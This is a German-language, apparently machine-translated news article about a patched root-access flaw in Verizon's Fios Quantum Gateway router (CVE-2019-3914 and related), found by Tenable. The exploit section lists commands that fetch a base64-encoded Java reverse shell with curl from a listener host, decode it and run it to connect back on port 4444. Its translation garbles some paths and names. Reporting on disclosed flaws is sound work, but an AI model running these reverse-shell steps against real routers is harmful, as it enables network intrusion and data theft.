Durch die Sicherheitsanfälligkeit in Verizon Fios Quantum Gateway können Angreifer Root-Berechtigungen erlangen

Warum Sie Ihren Heimrouter sperren sollten Im Zeitalter von BYOD ist Ihr Heimnetzwerk jetzt ein Bedrohungsvektor für Hacker, die auf Ihre Arbeitsgeräte abzielen, sagt CUJO SVP von Networks Marcio Avillez.

Eine Sicherheitsanfälligkeit in Verizon Fios Quantum Gateway - einem Wi-Fi-Router, der häufig Kunden des Glasfaser-Internetdienstes von Verizon zur Verfügung gestellt wird - ermöglicht es Angreifern, mit erheblichem Aufwand Root-Rechte zu erlangen. Die Sicherheitsanfälligkeit wurde von Chris Lyne bei Tenable Research entdeckt und zusammen mit einer Sicherheitsanfälligkeit bezüglich Login-Wiedergabe und Offenlegung von Kennwortsalzen entdeckt, deren Trio als CVE-2019-3914, CVE-2019-3915 und CVE-2019-3916 bezeichnet wird.

Durch den Root-Zugriff auf einen Router können Angreifer einen Einstiegspunkt für andere Geräte im Netzwerk erhalten, insbesondere für IoT-Geräte (Internet of Things), denen häufig eigene Sicherheitsmaßnahmen fehlen. Der Root-Zugriff kann auch genutzt werden, um im Netzwerk übertragene Informationen zu erfassen, z. B. Bankdaten. Dies gilt insbesondere in einem Geschäftsumfeld, in dem eine böswillige Partei, die Root-Zugriff auf einen Router erhält, möglicherweise das Netzwerk eines gesamten Unternehmens gefährden kann.

Im April 2018 gaben das Department of Homeland Security (DHS), das Federal Bureau of Investigation (FBI) und das britische National Cyber ​​Security Centre (NCSC) eine gemeinsame Warnung vor staatlich geförderten Hackern heraus, die Schwachstellen in Routern ausnutzen. Die im selben Jahr entdeckten Slingshot- und VPNFilter-Malware-Familien wurden entdeckt.

Tenable stellt fest, dass das Verizon Fios Quantum Gateway von Greenwave Systems auf seiner AXON-Plattform gemeinsam entwickelt wurde und dass Greenwave und Verizon "rechtzeitig einen Patch erstellt haben". Verizon hat am 13. März mit der Bereitstellung des Patches - Version 02.02.00.13 - begonnen und wird automatisch auf den betroffenen Geräten installiert.

Wie der Exploit funktioniert

Das Auftauchen dieses Exploits zeigt eine Menge Sicherheitshärtung, die Greenwave und Verizon in den Router eingebaut haben. Die vollständige Erklärung von Tenable enthält detailliertere Informationen und potenzielle Angriffsszenarien, die alle Insider-Zugriff erfordern oder auf Social Engineering angewiesen sind, um jemanden mit Insider-Zugriff davon zu überzeugen, ausreichende Details bereitzustellen, um eine Remote-Ausnutzung zu ermöglichen.

Die beim Öffnen von SSH bereitgestellte Shell (keine Standardkonfiguration) ist eine relativ eingeschränkte Version von BusyBox, obwohl die Aufnahme einer JVM eine Möglichkeit zum Hochladen einer Reverse-Shell bot, die hier kurz erläutert wird:

  1. cd / mnt / config
    • Zuerst wird das Arbeitsverzeichnis in das beschreibbare Verzeichnis / mnt / config geändert.
  2. Curl http://192.168.1.191:8080/ -o sh_b64
    • Next Curl wird verwendet, um die Base64-codierte Java-Reverse-Shell-Klasse herunterzuladen. Es wird als Datei mit dem Namen 'sh_b64' gespeichert. Denken Sie daran, dass der Listener dies zurückgibt
  3. base64 -d sh_b64> ReverseTcpShell.class
    • Die 'sh_b64'-Datei wird von Base64 dekodiert und als' ReverseTcpShell.class 'geschrieben.
  4. / usr / local / jvm / bin / belagerung ReverseTcpShell 192.168.1.191 4444 &
    • Schließlich wird die ReverseTcpShell-Klasse mithilfe der eingebetteten JVM "Belagerung" gestartet. Dadurch wird unter IP 192.168.1.191 eine Verbindung zum Netcat-Listener hergestellt, der den TCP-Port 4444 überwacht. Dieser Vorgang wird im Hintergrund ausgeführt (&).

Tenable stellt den TCP-Shell-Java-Code und den vollständigen Exploit-Code auf GitHub für Forschungszwecke bereit.

Weitere Informationen zur Bedeutung der Routersicherheit finden Sie unter "Sicherheitsanfälligkeit in MikroTik RouterOS ermöglicht leicht ausnutzbare Denial-of-Service-Angriffe".

Cybersecurity Insider Newsletter

Stärken Sie die IT-Sicherheitsabwehr Ihres Unternehmens, indem Sie sich über die neuesten Nachrichten, Lösungen und Best Practices zur Cybersicherheit auf dem Laufenden halten. Lieferung dienstags und donnerstags

Heute anmelden

© Copyright 2021 | mobilegn.com